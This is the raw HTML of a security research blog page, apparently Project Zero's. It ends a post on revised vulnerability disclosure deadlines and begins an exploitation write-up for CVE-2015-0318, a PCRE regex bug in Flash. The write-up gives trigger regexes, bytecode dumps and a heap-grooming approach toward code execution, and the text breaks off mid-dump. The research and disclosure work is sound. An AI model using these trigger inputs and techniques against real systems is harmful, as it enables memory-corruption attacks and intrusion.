pre-wrap;"> </span><a href="https://code.google.com/p/google-security-research/issues/detail?id=136" style="text-decoration: none;"><span style="background-color: transparent; color: #1155cc; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">misses</span></a><span style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> were typically fixed very quickly after 90 days. Looking ahead, we’re not going to have any deadline misses for at least the rest of February.</span></div> <b style="font-weight: normal;"><br /></b> <div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Deadlines appear to be working to improve patch times and end user security -- especially when enforced consistently.</span></div> <b style="font-weight: normal;"><br /></b> <div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">We’ve studied the above data and taken on board some great debate and external feedback around some of the corner cases for disclosure deadlines. We have improved the policy in the following ways:</span></div> <b style="font-weight: normal;"><br /></b> <ul style="margin-bottom: 0pt; margin-top: 0pt;"> <li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; list-style-type: disc; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Weekends and holidays</span><span style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">. If a deadline is due to expire on a weekend or US public holiday, the deadline will be moved to the next normal work day.</span></div> </li> <li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; list-style-type: disc; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Grace period</span><span style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">. We now have a 14-day grace period. If a 90-day deadline will expire but a vendor lets us know before the deadline that a patch is scheduled for release on a specific day within 14 days following the deadline, the public disclosure will be delayed until the availability of the patch. Public disclosure of an unpatched issue now only occurs if a deadline will be significantly missed (2 weeks+).</span></div> </li> <li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; list-style-type: disc; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Assignment of CVEs</span><span style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">. CVEs are an industry standard for uniquely identifying vulnerabilities. To avoid confusion, it’s important that the first public mention of a vulnerability should include a CVE. For vulnerabilities that go past deadline, we’ll ensure that a CVE has been pre-assigned.</span></div> </li> </ul> <b style="font-weight: normal;"><br /></b> <div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">As always, we reserve the right to bring deadlines forwards or backwards based on extreme circumstances. We remain committed to treating all vendors strictly equally. Google expects to be held to the same standard; in fact, Project Zero has bugs in the pipeline for Google products (Chrome and Android) and these are subject to the same deadline policy.</span></div> <b style="font-weight: normal;"><br /></b> <div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Putting everything together, we believe the policy updates are still strongly in line with our desire to improve industry response times to security bugs, but will result in softer landings for bugs marginally over deadline. Finally, we’d like to call on all researchers to adopt disclosure deadlines in some form, and feel free to use our policy verbatim if you find our data and reasoning compelling. We’re excited by the early results that disclosure deadlines are delivering -- and with the help of the broader community, we can achieve even more.</span></div> <br /> <div style='clear: both;'></div> </div> <div class='post-footer'> <div class='post-footer-line post-footer-line-1'> <span class='post-author vcard'> Posted by <span class='fn' itemprop='author' itemscope='itemscope' itemtype='http://schema.org/Person'> <span itemprop='name'>Anonymous</span> </span> </span> <span class='post-timestamp'> at <meta content='https://googleprojectzero.blogspot.com/2015/02/feedback-and-data-driven-updates-to.html' itemprop='url'/> <a class='timestamp-link' href='https://googleprojectzero.blogspot.com/2015/02/feedback-and-data-driven-updates-to.html' rel='bookmark' title='permanent link'><abbr class='published' itemprop='datePublished' title='2015-02-13T10:30:00-08:00'>10:30 AM</abbr></a> </span> <span class='post-comment-link'> <a class='comment-link' href='https://googleprojectzero.blogspot.com/2015/02/feedback-and-data-driven-updates-to.html#comment-form' onclick=''> No comments: </a> </span> <span class='post-icons'> <span class='item-control blog-admin pid-836442233'> <a href='https://www.blogger.com/post-edit.g?blogID=4838136820032157985&postID=6442115564148136286&from=pencil' title='Edit Post'> <img alt='' class='icon-action' height='18' src='https://resources.blogblog.com/img/icon18_edit_allbkg.gif' width='18'/> </a> </span> </span> <div class='post-share-buttons goog-inline-block'> <a class='goog-inline-block share-button sb-email' href='https://www.blogger.com/share-post.g?blogID=4838136820032157985&postID=6442115564148136286&target=email' target='_blank' title='Email This'><span class='share-button-link-text'>Email This</span></a><a class='goog-inline-block share-button sb-blog' href='https://www.blogger.com/share-post.g?blogID=4838136820032157985&postID=6442115564148136286&target=blog' onclick='window.open(this.href, "_blank", "height=270,width=475"); return false;' target='_blank' title='BlogThis!'><span class='share-button-link-text'>BlogThis!</span></a><a class='goog-inline-block share-button sb-twitter' href='https://www.blogger.com/share-post.g?blogID=4838136820032157985&postID=6442115564148136286&target=twitter' target='_blank' title='Share to X'><span class='share-button-link-text'>Share to X</span></a><a class='goog-inline-block share-button sb-facebook' href='https://www.blogger.com/share-post.g?blogID=4838136820032157985&postID=6442115564148136286&target=facebook' onclick='window.open(this.href, "_blank", "height=430,width=640"); return false;' target='_blank' title='Share to Facebook'><span class='share-button-link-text'>Share to Facebook</span></a><a class='goog-inline-block share-button sb-pinterest' href='https://www.blogger.com/share-post.g?blogID=4838136820032157985&postID=6442115564148136286&target=pinterest' target='_blank' title='Share to Pinterest'><span class='share-button-link-text'>Share to Pinterest</span></a> </div> </div> <div class='post-footer-line post-footer-line-2'> <span class='post-labels'> </span> </div> <div class='post-footer-line post-footer-line-3'> <span class='post-location'> </span> </div> </div> </div> </div> </div></div> <div class="date-outer"> <h2 class='date-header'><span>Thursday, February 12, 2015</span></h2> <div class="date-posts"> <div class='post-outer'> <div class='post hentry uncustomized-post-template' itemprop='blogPost' itemscope='itemscope' itemtype='http://schema.org/BlogPosting'> <meta content='4838136820032157985' itemprop='blogId'/> <meta content='1656803005637984371' itemprop='postId'/> <a name='1656803005637984371'></a> <h3 class='post-title entry-title' itemprop='name'> <a href='https://googleprojectzero.blogspot.com/2015/02/exploitingscve-2015-0318sinsflash.html'>(^Exploiting)\s*(CVE-2015-0318)\s*(in)\s*(Flash$)</a> </h3> <div class='post-header'> <div class='post-header-line-1'></div> </div> <div class='post-body entry-content' id='post-body-1656803005637984371' itemprop='description articleBody'> <span id="docs-internal-guid-1693c82f-7edc-8502-a81a-457a8064ab26"><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="font-family: Arial; font-size: 15px; line-height: 1.38; white-space: pre-wrap;">Posted by Mark Brand, Irregular Expressionist</span></div> <br /><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="font-family: Arial; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">So; </span><a href="https://code.google.com/p/google-security-research/issues/detail?id=199" style="text-decoration: none;"><span style="color: #1155cc; font-family: Arial; font-size: 15px; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">issue 199/PSIRT-3161/CVE-2015-0318</span></a><span style="font-family: Arial; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">. Quick summary - it’s a bug in the PCRE regex engine </span><a href="https://github.com/adobe-flash/avmplus/tree/master/pcre" style="text-decoration: none;"><span style="color: #1155cc; font-family: Arial; font-size: 15px; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">as used in Flash</span></a><span style="font-family: Arial; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">. (Note that the published version of the avmplus code is significantly out of date; there are a number of other vulnerabilities present that have already been fixed by Adobe; so auditing it can be a little frustrating!).</span></div> <br /><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="font-family: Arial; font-size: 15px; font-weight: bold; vertical-align: baseline; white-space: pre-wrap;">Spoiler:</span><span style="font-family: Arial; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"> it’s exploitable. </span><span style="font-family: Arial; font-size: 15px; font-style: italic; vertical-align: baseline; white-space: pre-wrap;">Grab the exploit from the issues page and read along.</span></div> <br /><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="font-family: Arial; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">So, for a little bit of background - PCRE is the regular expression library used in Flash to back their implementation of the RegExp object. PCRE is a complex library, that supports several different operating modes, including a JIT. However, the mode that is used by Flash is one in which the regex string is parsed and compiled to an internal bytecode (‘PCRE bytecode’) that is then interpreted in order to match the regex; so for vulnerabilities in Flash we are mainly interested in vulnerabilities either in the regex parsing, the bytecode compilation or during the interpretation. This particular vulnerability results from an issue in the bytecode compilation; and the root cause of the issue can be found in this code, starting at </span><a href="https://github.com/adobe-flash/avmplus/blob/master/pcre/pcre_compile.cpp#L743" style="text-decoration: none;"><span style="color: #1155cc; font-family: Arial; font-size: 15px; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">line 743</span></a><span style="font-family: Arial; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">:</span></div> <br /><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="font-family: 'Courier New'; font-size: 11px; vertical-align: baseline; white-space: pre-wrap;"> /* For \c, a following letter is upper-cased; then the 0x40 bit is flipped.</span></div> <div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="font-family: 'Courier New'; font-size: 11px; vertical-align: baseline; white-space: pre-wrap;"> </span><span style="color: red; font-family: 'Courier New'; font-size: 11px; font-weight: bold; vertical-align: baseline; white-space: pre-wrap;">This coding is ASCII-specific, but then the whole concept of \cx is</span></div> <div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="color: red; font-family: 'Courier New'; font-size: 11px; font-weight: bold; vertical-align: baseline; white-space: pre-wrap;"> ASCII-specific. </span><span style="font-family: 'Courier New'; font-size: 11px; vertical-align: baseline; white-space: pre-wrap;">(However, an EBCDIC equivalent has now been added.) */</span></div> <br /><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="font-family: 'Courier New'; font-size: 11px; vertical-align: baseline; white-space: pre-wrap;"> case 'c': </span><span style="color: red; font-family: 'Courier New'; font-size: 11px; font-weight: bold; vertical-align: baseline; white-space: pre-wrap;"><---- There’s no check to see if we’re in UTF8 mode</span></div> <div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="font-family: 'Courier New'; font-size: 11px; vertical-align: baseline; white-space: pre-wrap;"> c = *(++ptr); </span><span style="color: red; font-family: 'Courier New'; font-size: 11px; font-weight: bold; vertical-align: baseline; white-space: pre-wrap;"><---- This could be part of a multibyte unicode character</span></div> <div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="font-family: 'Courier New'; font-size: 11px; vertical-align: baseline; white-space: pre-wrap;"> if (c == 0)</span></div> <div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="font-family: 'Courier New'; font-size: 11px; vertical-align: baseline; white-space: pre-wrap;"> {</span></div> <div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="font-family: 'Courier New'; font-size: 11px; vertical-align: baseline; white-space: pre-wrap;"> *errorcodeptr = ERR2;</span></div> <div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="font-family: 'Courier New'; font-size: 11px; vertical-align: baseline; white-space: pre-wrap;"> break;</span></div> <div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="font-family: 'Courier New'; font-size: 11px; vertical-align: baseline; white-space: pre-wrap;"> }</span></div> <br /><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="font-family: 'Courier New'; font-size: 11px; vertical-align: baseline; white-space: pre-wrap;">#ifndef EBCDIC /* ASCII coding */</span></div> <div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="font-family: 'Courier New'; font-size: 11px; vertical-align: baseline; white-space: pre-wrap;"> if (c >= 'a' && c <= 'z') c -= 32;</span></div> <div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="font-family: 'Courier New'; font-size: 11px; vertical-align: baseline; white-space: pre-wrap;"> c ^= 0x40;</span></div> <div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="font-family: 'Courier New'; font-size: 11px; vertical-align: baseline; white-space: pre-wrap;">#else /* EBCDIC coding */</span></div> <div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="font-family: 'Courier New'; font-size: 11px; vertical-align: baseline; white-space: pre-wrap;"> if (c >= 'a' && c <= 'z') c += 64;</span></div> <div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="font-family: 'Courier New'; font-size: 11px; vertical-align: baseline; white-space: pre-wrap;"> c ^= 0xC0;</span></div> <div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="font-family: 'Courier New'; font-size: 11px; vertical-align: baseline; white-space: pre-wrap;">#endif</span></div> <div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="font-family: 'Courier New'; font-size: 11px; vertical-align: baseline; white-space: pre-wrap;"> break;</span></div> <br /><br /><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="font-family: Arial; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">Below is what happens when we compile a regex that combines the \c escape sequence (which is intended to match a single ASCII character) with a multibyte UTF-8 character. A simple trigger for the bug is</span><span style="font-family: Consolas; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"> ‘\\c\xd0\x80+’</span><span style="font-family: Arial; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">, below.</span></div> <br /><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="font-family: 'Courier New'; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">\c衻+</span></div> <br /><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="font-family: Arial; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">This will compile to the following bytecode:</span></div> <br /><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="color: #3c78d8; font-family: 'Courier New'; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">0000 </span><span style="color: red; font-family: 'Courier New'; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">5d0009</span><span style="color: #cc0000; font-family: 'Courier New'; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"> </span><span style="font-family: 'Courier New'; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"> </span><span style="color: #f1c232; font-family: 'Courier New'; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"> 93 BRA </span><span style="font-family: 'Courier New'; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"> </span><span style="color: #6aa84f; font-family: 'Courier New'; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">[9]</span></div> <div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="color: #3c78d8; font-family: 'Courier New'; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">0003</span><span style="font-family: 'Courier New'; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"> </span><span style="color: red; font-family: 'Courier New'; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">1bc290</span><span style="font-family: 'Courier New'; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"> </span><span style="color: #f1c232; font-family: 'Courier New'; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"> 27 CHAR </span><span style="font-family: 'Courier New'; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"> </span><span style="color: #6aa84f; font-family: 'Courier New'; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"> ['\xc2\x90']</span></div> <div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="color: #3c78d8; font-family: 'Courier New'; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">0006</span><span style="font-family: 'Courier New'; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"> </span><span style="color: red; font-family: 'Courier New'; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">201b</span><span style="font-family: 'Courier New'; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"> </span><span style="color: #f1c232; font-family: 'Courier New'; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">32 PLUS </span><span style="font-family: 'Courier New'; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"> </span><span style="color: #6aa84f; font-family: 'Courier New'; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">['\x1b']</span></div> <div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="color: #3c78d8; font-family: 'Courier New'; font-size: 15px; font-weight: bold; vertical-align: baseline; white-space: pre-wrap;">0008 </span><span style="color: red; font-family: 'Courier New'; font-size: 15px; font-weight: bold; vertical-align: baseline; white-space: pre-wrap;">80 </span><span style="color: #ffd966; font-family: 'Courier New'; font-size: 15px; font-weight: bold; vertical-align: baseline; white-space: pre-wrap;"> </span><span style="color: #f1c232; font-family: 'Courier New'; font-size: 15px; font-weight: bold; vertical-align: baseline; white-space: pre-wrap;"> 128 INVALID </span></div> <div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="color: #3c78d8; font-family: 'Courier New'; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">0009 </span><span style="color: red; font-family: 'Courier New'; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">540009</span><span style="color: #3c78d8; font-family: 'Courier New'; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"> </span><span style="color: #f1c232; font-family: 'Courier New'; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"> 84 KET </span><span style="color: #3c78d8; font-family: 'Courier New'; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"> </span><span style="color: #6aa84f; font-family: 'Courier New'; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">[9]</span></div> <div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="color: #3c78d8; font-family: 'Courier New'; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">000c</span><span style="color: red; font-family: 'Courier New'; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"> 00 </span><span style="color: #3c78d8; font-family: 'Courier New'; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"> </span><span style="color: #f1c232; font-family: 'Courier New'; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"> 0 END</span><span style="color: #3c78d8; font-family: 'Courier New'; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"> </span></div> <br /><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="font-family: Arial; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">So clearly something has gone wrong… The question is now how to leverage this invalid bytecode to get code execution. Unfortunately, if we simply execute the expression, the behaviour on encountering an invalid opcode is simply to terminate the match as a failure; not a very exciting possibility.</span></div> <br /><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="font-family: Arial; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">There are however a number of other functions in pcre_compile.cpp that give us some additional options; the one that I chose to use was </span><span style="font-family: Consolas; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">find_brackets</span><span style="font-family: Arial; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">, as this iterates through the current bytecode, has a permissive default case, and is used to locate (and patch in an offset to) a numbered group; so there is the possibility to perhaps cause some interesting memory corruption or get execution of PCRE bytecode somewhere other than the legitimate bytecode. </span></div> <br /><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="font-family: Arial; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">This turns out to be the case; by adding a back-reference to our regular expression,</span><span style="font-family: Consolas; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"> </span></div> <br /><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="background-color: white; font-family: 'Courier New'; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">\c衻+</span><span style="background-color: #93c47d; font-family: 'Courier New'; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">(?1)</span></div> <br /><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="font-family: Arial; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">we can hit the</span><a href="https://github.com/adobe-flash/avmplus/blob/master/pcre/pcre_compile.cpp#L1635" style="text-decoration: none;"><span style="color: #1155cc; font-family: Arial; font-size: 15px; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;"> following line of code</span></a><span style="font-family: Arial; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"> with </span><span style="font-family: Consolas; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">‘c’</span><span style="font-family: Arial; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"> set to our invalid opcode, 0x80:</span></div> <br /><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="font-family: 'Courier New'; font-size: 11px; vertical-align: baseline; white-space: pre-wrap;">/* Add in the fixed length from the table */</span></div> <div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="font-family: 'Courier New'; font-size: 11px; vertical-align: baseline; white-space: pre-wrap;">code += _pcre_OP_lengths[c];</span></div> <br /><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="font-family: Arial; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">Now,</span><span style="font-family: Consolas; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"> _pcre_OP_lengths</span><span style="font-family: Arial; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"> is a global array, and 0x80 indexes a little way past the end of the array, conveniently this is (on Windows and Linux, at least) located in the Flash binary directly before an array of strings used for internationalisation. In every version of Flash I looked at, this will get us a length of 110 (which is significantly larger than any valid bytecode op length), so if we can groom the heap, we can hop the code pointer out of the allocated bytecode buffer and into data we control. We then just need to arrange to have </span><span style="font-family: Consolas; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">find_bracket</span><span style="font-family: Arial; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"> locate the bytecode pattern it’s hunting for in that buffer, and then it will helpfully link our malicious bytecode into the regex program, ready to be executed.</span></div> <br /><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="font-family: Arial; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">We run into a slight hiccup when we want to actually execute this regex; the bytecode interpreter will exit when encountering an invalid opcode. However, we can get around this fairly easily by wrapping our broken bytecode in an optional group;</span></div> <br /><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="background-color: #93c47d; font-family: 'Courier New'; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">(</span><span style="font-family: 'Courier New'; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">\c衻+</span><span style="background-color: #93c47d; font-family: 'Courier New'; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">)?</span><span style="font-family: 'Courier New'; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">(?2)</span></div> <br /><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="font-family: Arial; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">With an appropriate groom with buffers containing the bytecode for group 2, we get a successful compilation to:</span></div> <br /><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="font-family: 'Courier New'; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">LEGITIMATE HEAP BUFFER</span></div> <div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="color: #3c78d8; font-family: 'Courier New'; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">0000</span><span style="font-family: 'Courier New'; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"> </span><span style="color: #cc0000; font-family: 'Courier New'; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">5d001b</span><span style="font-family: 'Courier New'; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"> </span><span style="color: #f1c232; font-family: 'Courier New'; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">93 BRA </span><span style="font-family: 'Courier New'; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"> </span><span style="color: #6aa84f; font-family: 'Courier New'; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"> [27]</span></div> <div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="color: #3c78d8; font-family: 'Courier New'; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">0003</span><span style="font-family: 'Courier New'; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"> </span><span style="color: #cc0000; font-family: 'Courier New'; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">66</span><span style="font-family: 'Courier New'; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"> </span><span style="color: #f1c232; font-family: 'Courier New'; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">102 BRAZERO</span><span style="font-family: 'Courier New'; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"> </span></div> <div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="color: #3c78d8; font-family: 'Courier New'; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">0004</span><span style="font-family: 'Courier New'; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"> </span><span style="color: #cc0000; font-family: 'Courier New'; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">5e000b0001</span><span style="font-family: 'Courier New'; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"> </span><span style="color: #f1c232; font-family: 'Courier New'; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">94 CBRA </span><span style="font-family: 'Courier New'; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"> </span><span style="color: #6aa84f; font-family: 'Courier New'; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"> [11, 1]</span></div> <div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="color: #3c78d8; font-family: 'Courier New'; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">0009</span><span style="font-family: 'Courier New'; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"> </span><span style="color: #cc0000; font-family: 'Courier New'; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">1bc290 </span><span style="font-family: 'Courier New'; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"> </span><span style="color: #f1c232; font-family: 'Courier New'; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">27 CHAR </span><span style="font-family: 'Courier New'; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"> </span><span style="color: #6aa84f; font-family: 'Courier New'; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">['\xc2\x90']</span></div> <div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="color: #3c78d8; font-family: 'Courier New'; font-size: 15px; 